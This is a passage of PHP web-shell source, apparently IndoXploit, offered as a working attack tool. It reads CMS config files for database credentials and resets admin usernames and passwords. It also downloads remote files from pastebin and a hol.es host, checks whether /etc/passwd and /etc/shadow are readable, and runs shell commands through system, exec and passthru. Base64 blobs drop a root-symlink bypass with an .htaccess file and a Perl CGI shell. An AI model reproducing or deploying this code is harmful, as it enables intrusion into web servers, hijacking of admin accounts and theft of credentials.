2044. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
2045. $prefix = $dbprefix."admin_user";
2046. $option = $dbprefix."core_config_data";
2047. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2048. $db = mysql_select_db($dbname);
2049. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
2050. $result = mysql_fetch_array($q);
2051. $id = $result[user_id];
2052. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
2053. $result2 = mysql_fetch_array($q2);
2054. $target = $result2[value];
2055. if($target == '') {
2056. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2057. } else {
2058. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
2059. }
2060. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
2061. echo "Config => ".$file_conf."<br>";
2062. echo "CMS => Magento<br>";
2063. echo $url_target;
2064. if(!$update OR !$conn OR !$db) {
2065. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2066. } else {
2067. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2068. }
2069. mysql_close($conn);
2070. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
2071. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
2072. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
2073. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
2074. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
2075. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
2076. $prefix = $dbprefix."user";
2077. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2078. $db = mysql_select_db($dbname);
2079. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
2080. $result = mysql_fetch_array($q);
2081. $id = $result[user_id];
2082. $target = ambilkata($config,"HTTP_SERVER', '","'");
2083. if($target == '') {
2084. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2085. } else {
2086. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
2087. }
2088. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
2089. echo "Config => ".$file_conf."<br>";
2090. echo "CMS => OpenCart<br>";
2091. echo $url_target;
2092. if(!$update OR !$conn OR !$db) {
2093. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2094. } else {
2095. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2096. }
2097. mysql_close($conn);
2098. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
2099. $dbhost = ambilkata($config,'server = "','"');
2100. $dbuser = ambilkata($config,'username = "','"');
2101. $dbpass = ambilkata($config,'password = "','"');
2102. $dbname = ambilkata($config,'database = "','"');
2103. $prefix = "users";
2104. $option = "identitas";
2105. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2106. $db = mysql_select_db($dbname);
2107. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
2108. $result = mysql_fetch_array($q);
2109. $target = $result[alamat_website];
2110. if($target == '') {
2111. $target2 = $result[url];
2112. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2113. if($target2 == '') {
2114. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2115. } else {
2116. $cek_login3 = file_get_contents("$target2/adminweb/");
2117. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
2118. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
2119. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
2120. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
2121. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
2122. } else {
2123. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
2124. }
2125. }
2126. } else {
2127. $cek_login = file_get_contents("$target/adminweb/");
2128. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
2129. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
2130. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
2131. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
2132. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
2133. } else {
2134. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
2135. }
2136. }
2137. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
2138. echo "Config => ".$file_conf."<br>";
2139. echo "CMS => Lokomedia<br>";
2140. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
2141. echo $url_target2;
2142. } else {
2143. echo $url_target;
2144. }
2145. if(!$update OR !$conn OR !$db) {
2146. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2147. } else {
2148. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2149. }
2150. mysql_close($conn);
2151. }
2152. }
2153. }
2154. } else {
2155. echo "<center>
2156. <h1>Auto Edit User Config</h1>
2157. <form method='post'>
2158. DIR Config: <br>
2159. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
2160. Set User & Pass: <br>
2161. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
2162. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
2163. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
2164. </form>
2165. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
2166. ";
2167. }
2168. }
2169. elseif($_GET['do'] == 'adminer') {
2170. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2171. function adminer($url, $isi) {
2172. $fp = fopen($isi, "w");
2173. $ch = curl_init();
2174. curl_setopt($ch, CURLOPT_URL, $url);
2175. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
2176. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2177. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2178. curl_setopt($ch, CURLOPT_FILE, $fp);
2179. return curl_exec($ch);
2180. curl_close($ch);
2181. fclose($fp);
2182. ob_flush();
2183. flush();
2184. }
2185. if(file_exists('sql.php')) {
2186. echo "<center><font color=lime><a href='$full/sql.php' target='_blank'>adminer login</a></font></center>";
2187. } else {
2188. if(adminer("http://pastebin.com/raw/EzJmmzXt","sql.php")) {
2189. echo "<center><font color=lime><a href='$full/sql.php' target='_blank'>-> adminer login <-</a></font></center>";
2190. } else {
2191. echo "<center><font color=red>gagal buat file adminer</font></center>";
2192. }
2193. }
2194.  
2195. }
2196. elseif($_GET['do'] == 'ac') {
2197. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2198. function adminer($url, $isi) {
2199. $fp = fopen($isi, "w");
2200. $ch = curl_init();
2201. curl_setopt($ch, CURLOPT_URL, $url);
2202. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
2203. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2204. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2205. curl_setopt($ch, CURLOPT_FILE, $fp);
2206. return curl_exec($ch);
2207. curl_close($ch);
2208. fclose($fp);
2209. ob_flush();
2210. flush();
2211. }
2212. if(file_exists('sql.php')) {
2213. echo "<center><font color=lime>Done ac.zip</font></center>";
2214. } else {
2215. if(adminer("http://hbd-denita.hol.es/ac.zip","ac.zip")) {
2216. echo "<center><font color=lime>Done ac.zip</font></center>";
2217. } else {
2218. echo "<center><font color=red>gagal</font></center>";
2219. }
2220. }
2221.  
2222. }
2223. elseif($_GET['do'] == 'server') {
2224. echo "<br><center><span style='font-size:30px; font-family:Fredericka the Great; color:white'>Server Security Informations</span><center><br>";
2225. echo "<center><div class='tmpe'>
2226. <table align='center' width='50%'><td><font color='white'>Kernel Version</font></td><td>";echo php_uname();
2227. echo "<tr><td><font color='white'>Web Server</font></td><td>";echo $_SERVER["SERVER_SOFTWARE"];
2228. echo "<tr><td><font color='white'>PHP Version</font></td><td>";echo phpversion(); echo " on "; echo php_sapi_name();
2229. echo "<tr><td><font color='white'>Current User</font></td><td>";echo get_current_user();
2230. echo "<tr><td><font color='white'>User ID</font></td><td>";echo getmyuid();
2231. echo "<tr><td><font color='white'>Group</font></td><td>";echo getmygid();
2232. echo "<tr><td><font color='white'>Cwd </font></td><td>";echo getcwd();
2233. echo "<tr><td><font color='white'>Admin Server</font></td><td>";echo $_SERVER['SERVER_ADMIN'];
2234. echo "<tr><td><font color='white'>Server Port</font></td><td>";echo $_SERVER['SERVER_PORT'];
2235. echo "<tr><td><font color='white'>Server IP</font></td><td>";echo $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
2236. echo "<tr><td><font color='white'>Client IP</font></td><td>";echo $_SERVER['REMOTE_ADDR'];
2237. echo "<tr><td><font color='white'>cURL support</font></td><td>";echo function_exists('curl_version')?'Enabled':"<font color='red'>No</font>";
2238. echo "<tr><td><font color='white'>Readable /etc/passwd</font></td><td>";echo @is_readable('/etc/passwd')?"Readable</a>":"<font color='red'>Not Readable</font>";
2239. echo "<tr><td><font color='white'>Readable /etc/shadow</font></td><td>";echo @is_readable('/etc/shadow')?"Readable":"<font color='red'>Not Readable</font>";
2240. $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON <font color='white'>secure</font>":"OFF <font color='red'>not secure</font>";
2241. echo "<tr><td><font color='white'>Open Base Dir</font></td><td><font class=txt>" . $base . "</font>";
2242. echo "</table></div></center><br>";
2243. }
2244. elseif($_GET['do'] == 'baipas') {
2245. echo "<center>";
2246. echo "<ul>";
2247. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2248. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2249. echo "<li> <a href='?dir=$dir&do=baper'>Bypass Perl Security</a> </li>";
2250. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Root Access</a> </li>";
2251. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2252. echo "</ul>";
2253. echo "</center>";
2254. }
2255. elseif($_GET['do'] == 'baus') {
2256. echo "<center>";
2257. echo "<ul>";
2258. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2259. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2260. echo "<li> <a href='?dir=$dir&do=baper'>Bypass Perl Security</a> </li>";
2261. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Root Access</a> </li>";
2262. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2263. echo "</ul>";
2264. echo "</center>";
2265. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Bypass Users Server Priv8</span><br>Coded By Mauritania Attacker<center><br><br>';
2266. echo '
2267. <div class="tul"><font color="ee5500" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">
2268.  
2269. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with awk program
2270. <form method="post">
2271. <input type="submit" value="Bypass" name="awk">
2272. </form>
2273. </center>
2274. </p>
2275.  
2276.  
2277.  
2278. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with System Function
2279. <form method="post">
2280. <input type="submit" value="Bypass" name="syst">
2281. </form>
2282. </center>
2283. </p>
2284.  
2285. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with Passthru Function
2286. <form method="post">
2287. <input type="submit" value="Bypass" name="passth">
2288. </form>
2289. </center>
2290. </p>
2291.  
2292. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with exec Function
2293. <form method="post">
2294. <input type="submit" value="Bypass" name="ex">
2295. </form>
2296. </center>
2297. </p>
2298.  
2299. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with shell_exec Function
2300. <form method="post">
2301. <input type="submit" value="Bypass" name="shex">
2302. </form>
2303. </center><br>
2304. </p><center>';
2305.  
2306.  
2307. //Awk Program //
2308. if ($_POST['awk']) {
2309. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2310. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
2311. echo "</textarea><br>";
2312. echo "
2313. <br>
2314. <b>
2315. </b>
2316. <br>
2317. ";
2318. }
2319. echo "</center><center>";
2320.  
2321. //System Function //
2322. if ($_POST['syst']) {
2323. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2324. echo system("ls /var/mail");
2325. echo "</textarea><br>";
2326. echo "
2327. <br>
2328. <b>
2329. </b>
2330. <br>
2331. ";
2332. }
2333.  
2334. echo "</center><center>";
2335.  
2336. //Passthru Function //
2337. if ($_POST['passth']) {
2338. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2339. echo passthru("ls /var/mail");
2340. echo "</textarea><br>";
2341. echo "
2342. <br>
2343. <b>
2344. </b>
2345. <br>
2346. ";
2347. }
2348. echo "</center><center>";
2349.  
2350. //exec Function //
2351. if ($_POST['ex']) {
2352. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2353. echo exec("ls /var/mail");
2354. echo "</textarea><br>";
2355. echo "
2356. <br>
2357. <b>
2358.  
2359. </b>
2360. <br>
2361. ";
2362. }
2363.  
2364. echo "</center><center>";
2365.  
2366. //exec Function //
2367. if ($_POST['shex']) {
2368. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2369. echo shell_exec("ls /var/mail");
2370. echo "</textarea><br>";
2371. echo "
2372. <br>
2373. <b>
2374. </b>
2375. <br>
2376. ";
2377. }
2378.  
2379. }
2380. elseif($_GET['do'] == 'barut') {
2381. echo "<center>";
2382. echo "<ul>";
2383. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2384. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2385. echo "<li> <a href='?dir=$dir&do=baper'>Bypass Perl Security</a> </li>";
2386. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Root Access</a> </li>";
2387. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2388. echo "</ul>";
2389. echo "</center>";
2390. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Bypass Root Path with system function</span><center><br>';
2391. mkdir('bforb', 0755);
2392. chdir('bforb');
2393. $bforb = 'PGhlYWQ+PHRpdGxlPkJ5cGFzcyBCeXBhc3MgUm9vdCBQYXRoIGJ5IGRlbml0YSBXb3JtPC90aXRsZT48L2hlYWQ+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3Lmljb25qLmNvbS9pY28vYy91L2N1MWJtcGdiMWsuaWNvIiB0eXBlPSJpbWFnZS94LWljb24iIC8+PHN0eWxlIHR5cGU9InRleHQvY3NzIj48IS0tIGJvZHkge2JhY2tncm91bmQtY29sb3I6IHRyYW5zcGFyZW50OyBmb250LWZhbWlseTpDb3VyaWVyCW1hcmdpbi1sZWZ0OiAwcHg7IG1hcmdpbi10b3A6IDBweDsgdGV4dC1hbGlnbjogY2VudGVyOyBOZXc7Zm9udC1zaXplOjEycHg7Y29sb3I6IzAwOTkwMDtmb250LXdlaWdodDo0MDA7fSBhe3RleHQtZGVjb3JhdGlvbjpub25lO30gYTpsaW5rIHtjb2xvcjojMDA5OTAwO30gYTp2aXNpdGVkIHtjb2xvcjojMDA3NzAwO30gYTpob3Zlcntjb2xvcjojMDBmZjAwO30gYTphY3RpdmUge2NvbG9yOiMwMDk5MDA7fSAtLT48IS0tIE1hZGUgQnkgZGVuaXRhIFdvcm0gLS0+PC9zdHlsZT48YnI+PGJyPjxib2R5IGJnQ29sb3I9IjAwMDAwMCI+PHRyPjx0ZD48P3BocCBlY2hvICI8Zm9ybSBtZXRob2Q9J1BPU1QnIGFjdGlvbj0nJz4iIDsgZWNobyAiPGNlbnRlcj48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nQnlwYXNzIGl0JyBuYW1lPSdkZW5pdGEnPjwvY2VudGVyPiI7IGlmIChpc3NldCgkX1BPU1RbJ2Rlbml0YSddKSl7IHN5c3RlbSgnbG4gLXMgLyBkZW5pdGEudHh0Jyk7ICRmdmNrZW0gPSdUM0IwYVc5dWN5QkpibVJsZUdWeklFWnZiR3h2ZDFONWJVeHBibXR6RFFwRWFYSmxZM1J2Y25sSmJtUmxlQ0J6YzNOemMzTXVhSFJ0RFFwQlpHUlVlWEJsSUhSNGRDQXVjR2h3RFFwQlpHUklZVzVrYkdWeUlIUjRkQ0F1Y0dodyc7JGZpbGUgPSBmb3BlbigiLmh0YWNjZXNzIiwidysiKTskd3JpdGUgPSBmd3JpdGUgKCRmaWxlICxiYXNlNjRfZGVjb2RlKCRmdmNrZW0pKTskZGVuaXRhID0gc3ltbGluaygiLyIsImRlbml0YS50eHQiKTskcnQ9Ijxicj48YSBocmVmPWRlbml0YS50eHQgVEFSR0VUPSdfYmxhbmsnPjxmb250IGNvbG9yPSMwMGJiMDAgc2l6ZT0yIGZhY2U9J0NvdXJpZXIgTmV3Jz48Yj5CeXBhc3NlZCBTdWNjZXNzZnVsbHk8L2I+PC9mb250PjwvYT4iO2VjaG8gIjxicj48YnI+PGI+RG9uZS4uICE8L2I+PGJyPjxicj5DaGVjayBsaW5rIGdpdmVuIGJlbG93IGZvciAvIGZvbGRlciBzeW1saW5rIDxicj4kcnQ8L2NlbnRlcj4iO30gZWNobyAiPC9mb3JtPiI7ICA/PjwvdGQ+PC90cj48L2JvZHk+PC9odG1sPg==';
2394.  
2395. $file = fopen("bforb.php" ,"w+");
2396. $write = fwrite ($file ,base64_decode($bforb));
2397. fclose($file);
2398. chmod("bforb.php",0755);
2399. echo "<iframe src=bforb/bforb.php width=60% height=60% frameborder=0></iframe>";
2400.  
2401. }
2402. elseif($_GET['do'] == 'baper') {
2403. echo "<center>";
2404. echo "<ul>";
2405. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2406. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2407. echo "<li> <a href='?dir=$dir&do=baper'>Bypass Perl Security</a> </li>";
2408. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Root Access</a> </li>";
2409. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2410. echo "</ul>";
2411. echo "</center>";
2412. mkdir('cgipl', 0755);
2413. chdir('cgipl');
2414. $kokdosya = ".htaccess";
2415. $dosya_adi = "$kokdosya";
2416. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
2417. $metin = "AddType application/x-httpd-cgi .root
2418. AddType application/x-httpd-cgi .root
2419. AddHandler cgi-script .root
2420. AddHandler cgi-script .root";
2421. fwrite ( $dosya , $metin ) ;
2422. fclose ($dosya);
2423. $cgipl = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5Bbm9uR2hvc3QgUGVybCBzaGVsbDwvYj4gIyBzZXJ2ZXINCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBDb25maWd1cmF0aW9uOiBZb3UgbmVlZCB0byBjaGFuZ2Ugb25seSAkUGFzc3dvcmQgYW5kICRXaW5OVC4gVGhlIG90aGVyDQojIHZhbHVlcyBzaG91bGQgd29yayBmaW5lIGZvciBtb3N0IHN5c3RlbXMuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQokUGFzc3dvcmQgPSAiZ2hvc3QiOwkJIyBDaGFuZ2UgdGhpcy4gWW91IHdpbGwgbmVlZCB0byBlbnRlciB0aGlzDQoJCQkJIyB0byBsb2dpbi4NCg0KJFdpbk5UID0gMDsJCQkjIFlvdSBuZWVkIHRvIGNoYW5nZSB0aGUgdmFsdWUgb2YgdGhpcyB0byAxIGlmDQoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQNCgkJCQkjIG1hY2hpbmUuIElmIHlvdSdyZSBydW5uaW5nIGl0IG9uIFVuaXgsIHlvdQ0KCQkJCSMgY2FuIGxlYXZlIHRoZSB2YWx1ZSBhcyBpdCBpcy4NCg0KJE5UQ21kU2VwID0gIiYiOwkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFdpbmRvd3MgTlQuDQoNCiRVbml4Q21kU2VwID0gIjsiOwkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFVuaXguDQoNCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkDQoJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMNCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0DQoJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLg0KCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMNCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4NCg0KJFNob3dEeW5hbWljT3V0cHV0ID0gMTsJCSMgSWYgdGhpcyBpcyAxLCB0aGVuIGRhdGEgaXMgc2VudCB0byB0aGUNCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQ0KCQkJCSMgaXQgaXMgYnVmZmVyZWQgYW5kIHNlbmQgd2hlbiB0aGUgY29tbWFuZA0KCQkJCSMgY29tcGxldGVzLiBUaGlzIGlzIHVzZWZ1bCBmb3IgY29tbWFuZHMgbGlrZQ0KCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0DQoJCQkJIyBpcyBiZWluZyBnZW5lcmF0ZWQuDQoNCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISENCg0KJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7DQokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7DQokUGF0aFNlcCA9ICgkV2luTlQgPyAiXFwiIDogIi8iKTsNCiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUmVhZHMgdGhlIGlucHV0IHNlbnQgYnkgdGhlIGJyb3dzZXIgYW5kIHBhcnNlcyB0aGUgaW5wdXQgdmFyaWFibGVzLiBJdA0KIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLg0KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9Lg0KIyBPdGhlciB2YXJpYWJsZXMgY2FuIGJlIGFjY2Vzc2VkIHVzaW5nICRpbnsndmFyJ30sIHdoZXJlIHZhciBpcyB0aGUgbmFtZSBvZg0KIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQ0KIyBzY3JpcHRzLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFJlYWRQYXJzZSANCnsNCglsb2NhbCAoKmluKSA9IEBfIGlmIEBfOw0KCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7DQoJDQoJJE11bHRpcGFydEZvcm1EYXRhID0gJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC87DQoNCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQ0KCXsNCgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQoJfQ0KCWVsc2lmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIlBPU1QiKQ0KCXsNCgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOw0KCQlyZWFkKFNURElOLCAkaW4sICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KCX0NCg0KCSMgaGFuZGxlIGZpbGUgdXBsb2FkIGRhdGENCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykNCgl7DQoJCSRCb3VuZGFyeSA9ICctLScuJDE7ICMgcGxlYXNlIHJlZmVyIHRvIFJGQzE4NjcgDQoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IA0KCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOw0KCQkkSGVhZGVyQm9keSA9fiAvXHJcblxyXG58XG5cbi87DQoJCSRIZWFkZXIgPSAkYDsNCgkJJEJvZHkgPSAkJzsNCiAJCSRCb2R5ID1+IHMvXHJcbiQvLzsgIyB0aGUgbGFzdCBcclxuIHdhcyBwdXQgaW4gYnkgTmV0c2NhcGUNCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7DQoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgDQoJCSRpbnsnZid9ID0gJDE7IA0KCQkkaW57J2YnfSA9fiBzL1wiLy9nOw0KCQkkaW57J2YnfSA9fiBzL1xzLy9nOw0KDQoJCSMgcGFyc2UgdHJhaWxlcg0KCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQ0KCQl7IA0KCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87DQoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87DQoJCQkka2V5ID0gJDE7DQoJCQkkdmFsID0gJCc7DQoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOw0KCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSRpbnska2V5fSA9ICR2YWw7IA0KCQl9DQoJfQ0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQ0KCXsNCgkJQGluID0gc3BsaXQoLyYvLCAkaW4pOw0KCQlmb3JlYWNoICRpICgwIC4uICQjaW4pDQoJCXsNCgkJCSRpblskaV0gPX4gcy9cKy8gL2c7DQoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOw0KCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsNCgkJCSRpbnska2V5fSAuPSAkdmFsOw0KCQl9DQo